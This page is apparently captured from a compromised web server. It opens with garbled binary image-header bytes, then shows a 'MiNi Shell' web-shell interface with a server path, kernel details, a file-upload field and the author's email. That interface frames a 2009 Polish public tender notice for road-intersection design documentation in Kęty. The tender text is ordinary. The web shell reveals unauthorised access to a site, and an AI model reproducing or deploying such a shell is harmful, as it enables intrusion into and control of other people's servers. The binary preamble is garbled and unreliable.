JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090406/92534-N-2009.html

<p class="kh_header"><b>Oświęcim: Przebudowa skrzyżowania ul. Wojska Polskiego w Kętach z drogą krajową Nr 52  w zakresie opracowania  dokumentacji projektowo - kosztorysowej.</b><br>
<b>Numer ogłoszenia: 92534 - 2009; data zamieszczenia: 06.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Oświęcimiu , ul. Stanisławy Leszczyńskiej 12, 32-600 Oświęcim, woj. małopolskie, tel. 033 8430622, faks 033 8433593.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa skrzyżowania ul. Wojska Polskiego w Kętach z drogą krajową Nr 52  w zakresie opracowania  dokumentacji projektowo - kosztorysowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem  zamówienia jest  świadczenie usług w zakresie opracowania  dokumentacji projektowo - kosztorysowej  dla  realizacji  zadania pn.: Przebudowa skrzyżowania ul. Wojska Polskiego w Kętach z drogą krajową Nr 52 .
2.	Zakres rzeczowy projektu obejmować będzie między innymi:
a)	rozwiązanie geometrii skrzyżowania ulicy Wojska Polskiego (droga powiatowa nr 1858K) z ulicą Kościuszki (droga krajowa nr 52),
b)	rozwiązanie sposobu odwodnienia
- w rejonie skrzyżowania ulicy Wojska Polskiego z ulicą Kościuszki
-  i na odcinku 700 m od skrzyżowania wzdłuż ul. Wojska Polskiego,
c)	dobudowę chodnika jednostronnego na odcinku 700 mb,
d)	remont nawierzchni i pobocza ulicy Wojska Polskiego na odcinku 700 m wraz z wjazdami.
3.	Zakres projektowanych robót winien obejmować w dostosowaniu do projektu przebudowy m. in.:
a)	przebudowę skrzyżowania,
b)	budowę systemu odwodnienia,
c)	przebudowa ulicy na przekrój pół-uliczny o szer. 6,0 m na długości ok. 700 mb, 
d)	dobudowę chodnika jednostronnego o szer. 1,5 m, krawężnik betonowy 15x30 ze ściekiem przykrawężnikowym, obrzeże 8x30,
e)	przebudowę lub remont, w niezbędnym zakresie, urządzeń obcych, sieci naziemnych i podziemnych, lub zabezpieczenia tych sieci zgodnie z uzgodnieniami,
f)	przebudowę lub remont obiektów inżynierskich, 
g)	remont nawierzchni z poszerzeniem do 6,0 m i dostosowaniem dla kategorii obciążenia ruchem KR 2,
h)	budowę bądź przebudowę zjazdów,
i)	docelowa organizacja ruchu.

4.	Szczegółowy zakres opracowania projektowo - kosztorysowego:
a)	uzyskanie aktualnych podkładów geodezyjnych niezbędnych do opracowania dokumentacji,
b)	inwentaryzacja pasa drogi 
c)	inwentaryzację zieleni wraz z oceną w sprawie pielęgnacji i w razie konieczności o wycince drzew.
d)	badania geotechniczne istniejącej nawierzchni i podłoża gruntowego, w tym odwierty, badania nośności jezdni, wraz z dokumentacją z badań,
e)	opracowanie projektu wstępnego (koncepcji) z propozycją dodatkowych wytycznych inwestorskich i uwarunkowań związanych z realizacją, oraz rozwiązań wariantowych wraz z oceną tych wariantów, celem ustalenia ostatecznego rozwiązania i uzyskania akceptacji ZDP dla proponowanego rozwiązania,
f)	po akceptacji rozwiązań wystąpić o warunki techniczne do Zarządu Dróg Powiatowych w Oświęcimiu, 
g)	opracować projekt drogowy przebudowy drogi przy uwzględnieniu warunków technicznych uzyskanych z ZDP,
h)	uzyskanie porozumień, zgód lub pozwoleń oraz warunków technicznych i realizacji wynikających z przepisów prawa oraz w razie konieczności dla potrzeb uzyskania pozwolenia na budowę.
i)	wystąpienie o zgody na realizację do właścicieli nieruchomości (prawo dysponowania nieruchomością na cele budowlane).
j)	dla elementów zlokalizowanych poza granicami pasa drogowego: opracowanie materiałów dla potrzeb uzyskania decyzji o ustaleniu lokalizacji celu publicznego lub decyzji o ustaleniu warunków zabudowy (Dz.U. Nr 80 z 2003r poz. 717),
k)	uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia,
l)	jeżeli zgodnie z uzyskaną decyzją przebudowa drogi tego wymaga - opracowanie raportu o wpływie inwestycji na środowisko,
m)	jeżeli przebudowa drogi tego wymaga - uzyskania pozwolenia wodno prawnego,
n)	wykonanie projektów budowlanych wszystkich koniecznych branż, uwzględniające przystosowanie obiektu do obowiązujących norm i przepisów, wraz z niezbędnymi opiniami, uzgodnieniami, pozwoleniami i sprawdzeniami projektów - opracowanych zgodnie z przepisami - w ilości 4 egz,
o)	uzyskanie pozwolenia na budowę.
p)	wykonanie projektów wykonawczych, uzupełniających i uszczegółowiających projekty budowlane w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygotowania oferty przez wykonawcę i realizację robót budowlanych - w ilości 6 egz,
q)	wykonanie Specyfikacji Technicznej wykonania i odbioru robót budowlanych, przez którą należy rozumieć opracowania zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót, a także do określenia zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji przedmiaru, wymagania w zakresie kontroli, wykonania badań, odbiorów, prób i rozruchu - w ilości 2 egz,
r)	wykonanie przedmiarów robót, przez które należy rozumieć opracowania zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem ilości jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalenia cen jednostkowych robót lub jednostkowych nakładów rzeczowych (nr katalogu, nr tablicy i kolumny). Przedmiar robót na podstawie rozwiązań projektowych zawartych w projektach wykonawczych w rozbiciu na branże - w ilości  2 egz,  
s)	wykonanie Kosztorysów inwestorskich na podstawie rozwiązań projektowych zawartych w projektach wykonawczych w rozbiciu na branże w wersji szczegółowej i uproszczonej - w ilości po 2 egz. 
t)	wykonanie Kosztorysów ofertowych (tzw. ślepych- dla potrzeb przetargu na realizację robót, w rozbiciu na branże - w ilości po 2 egz
u)	wykonanie Zbiorcze zestawienie kosztów (roboty budowlane, roboty tymczasowe, koszty wynikające z decyzji administracyjnych) - w ilości po 2 egz. 
5.	Szczegółowy opis przedmiotu zamówienia wraz z  Specyfikacją Wykonania Prac Projektowych  stanowi  załącznik Nr 1 do SIWZ  określający szczegółowy zakres opracowania oraz wymagania dotyczące wykonania i odbioru przedmiotu zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wamaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  O udzielenie zamówienia ubiegać się mogą Wykonawcy składający ważną i odpowiednią ofertę oraz:  
-  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
-  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
    -  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
    -   nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1    i 2 ustawy  PZP,
a ponadto spełniają niżej wymienione warunki:
a)	wykonali w ciągu ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi w zakresie opracowania dokumentacji projektowo - kosztorysowej w zakresie przebudowy  drogi  z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi  te zostały wykonane należycie, - w tym min. 1 zadanie o wartości min. 50.000,00 złotych brutto,
b)	dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia w tym min. 1 osobą posiadającą uprawnienia do projektowania:
 - w specjalności  drogowej  wraz z przynależnością do właściwej Izby Samorządu  Zawodowego na dzień składania ofert,
c)	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 
d)	oświadczą, że spełniają warunki określone w art. 22 PZP oraz że nie podlegają wykluczeniu z postępowania na podstawie art. 24 PZP,
e)	Zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust. 1 pkt. 2,3, ust. 2 pkt. 2, 5,5a, 6 oraz ust. 3 pkt. 3  Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane. (Dz.U. Nr 87 z dnia 24 maja 2006r. poz. 605).
2.	Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty wg zasady spełnia/nie spełnia.
3.	Wykonawca musi wykazać spełnienie każdego z warunków.
4.	Niespełnienie któregokolwiek warunku spowoduje wykluczenie Wykonawcy z postępowania.
5.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia ( pn. w  konsorcjum). W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego,  a jego pełnomocnictwo musi być podpisane przez uprawnionych przedstawicieli wszystkich pozostałych wykonawców. Przedmiotowe pełnomocnictwo musi zostać dołączone do oferty w oryginale lub odpisie potwierdzonym notarialnie.   Wykonawcy wspólnie ubiegający się o zamówienie, ponoszą solidarną odpowiedzialność za wykonanie umowy. 
6.	Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Wykonawca przed zawarciem umowy w sprawie zamówienia publicznego przedstawi  umowę regulującą współpracę wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia  spełnienia warunków udziału w postępowaniu  Wykonawca  składa    następujące  dokumenty i oświadczenia:
1.	Formularz oferty - wg załącznika nr 2 do SIWZ
2.	Pełnomocnictwo dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. 
3.	Pełnomocnictwo do sporządzenia i podpisania oferty, jeżeli ofertę podpisuje osoba upoważniona przez osobę lub osoby uprawnione do reprezentowania firmy w sposób określony w akcie rejestrowym.
4.	Przedmiotowe pełnomocnictwa muszą zostać dołączone do oferty w oryginale lub odpisie potwierdzonym notarialnie.  
5.	W przypadku, gdy składający ofertę są wspólnikami spółki cywilnej do oferty należy dołączyć kserokopie umowy spółki.
6.	Oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w   art. 22 ust. 1 i art. 24 ust. 1i2   ustawy Prawo zamówień publicznych - wg  załącznika Nr 3 do SIWZ. 
7.	Zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust. 1 pkt. 2,3, ust. 2 pkt. 2, 5, 5a, 6 oraz ust. 3 pkt. 3  Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane. (Dz.U. Nr 87,  poz. 605).
a)	Aktualnego  odpisu z  właściwego rejestru albo aktualnego  zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 m-cy  przed upływem terminu składania ofert. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia  w/w zaświadczenie składa  każdy z uczestników.
b)	Aktualne zaświadczenie  właściwego Naczelnika Urzędu Skarbowego  potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia  w/w zaświadczenie składa  każdy z uczestników.
c)	Aktualne zaświadczenie właściwego oddziału ZUS   lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca  nie zalega z opłatami lub uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia  w/w zaświadczenie składa  każdy z uczestników.
d)	Wykaz zrealizowanych zamówień wykonanych  w ciągu ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, -  wg załącznika Nr 5 do SIWZ.
e)	Wykaz osób  którymi dysponuje lub będzie dysponował Wykonawca i które będą  uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia  wraz z dokumentami stwierdzającymi posiadane uprawnienia  - wg załącznika Nr 4 do SIWZ. Jeżeli w wykazie Wykonawca  wskazał osoby, którymi będzie dysponował  należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia  osób zdolnych do wykonania zamówienia.
f)	Polisę lub inny dokument  ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej działalności gospodarczej.
8.	Oświadczenie Wykonawcy że zadanie będzie wykonane w całości siłami własnymi lub wykaz zakresu prac, które zamierza  powierzyć  podwykonawcom - wg załącznika Nr 6 do SIWZ.
9.	Wzór umowy wg zał. Nr 7 do SIWZ  - zaakceptowany przez osobę lub osoby upoważnione do reprezentowania podmiotu składającego ofertę.
10.	 Harmonogram rzeczowo - terminowo - finansowy (wycena) opracowania dokumentacji projektowo - kosztorysowej - wg zał. Nr 8 do SIWZ.
11.	Zgodnie z art. 23 ust.1 PZP Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia ( pn. w formie  konsorcjum). W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego,  a jego pełnomocnictwo musi być podpisane przez uprawnionych przedstawicieli wszystkich pozostałych wykonawców. Przedmiotowe pełnomocnictwo musi zostać dołączone do oferty w oryginale lub odpisie potwierdzonym notarialnie.  
12.	Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Wykonawca przed zawarciem umowy w sprawie zamówienia publicznego przedstawi  umowę regulującą współpracę wykonawców.
13.	 W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, dokumenty wymienione w punkcie 7 a-c   winien dołączyć każdy podmiot występujący wspólnie.
14.	Jeżeli Wykonawca nie złoży wymaganych dokumentów i oświadczeń lub nie spełni jednego bądź więcej warunków, jego oferta zostanie odrzucona lub Wykonawca zostanie wykluczony z postępowania. Zgodnie z art. 24 ust. 4 ustawy ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
15.	 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosuje się do przepisów § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. (Dz.U.Nr. 87, poz. 605) w sprawie rodzaju dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form w jakich te dokumenty mogą być składane   tj.:  w miejsce dokumentów, o których mowa w pkt. 7 a,b,c  zobowiązany jest przedłożyć dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości, - wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert
b)	nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert.

16.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się powyższych dokumentów, Wykonawca może je zastąpić stosownym dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
17.	Dokumenty, o których mowa w pkt. 15 i 16   i  sporządzone w języku obcym Wykonawca składa wraz z tłumaczeniem na język polski; tłumaczenie musi być sporządzone  przez tłumacza przysięgłego.
18.	  Dostarczane dokumenty ( za wyjątkiem pełnomocnictw oraz załączników od Nr 1 do 8 do SIWZ, które są składane tylko w oryginale)  mogą być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu w przypadku, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna  lub budzi wątpliwości co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat.oswiecim.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Oświęcimiu, ul. St. Leszczyńskiej 12, 32-600 Oświęcim,    -  pok. Nr 6..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2009 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Oświęcimiu, ul. St. Leszczyńskiej 12, 32-600 Oświęcim,    -  sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com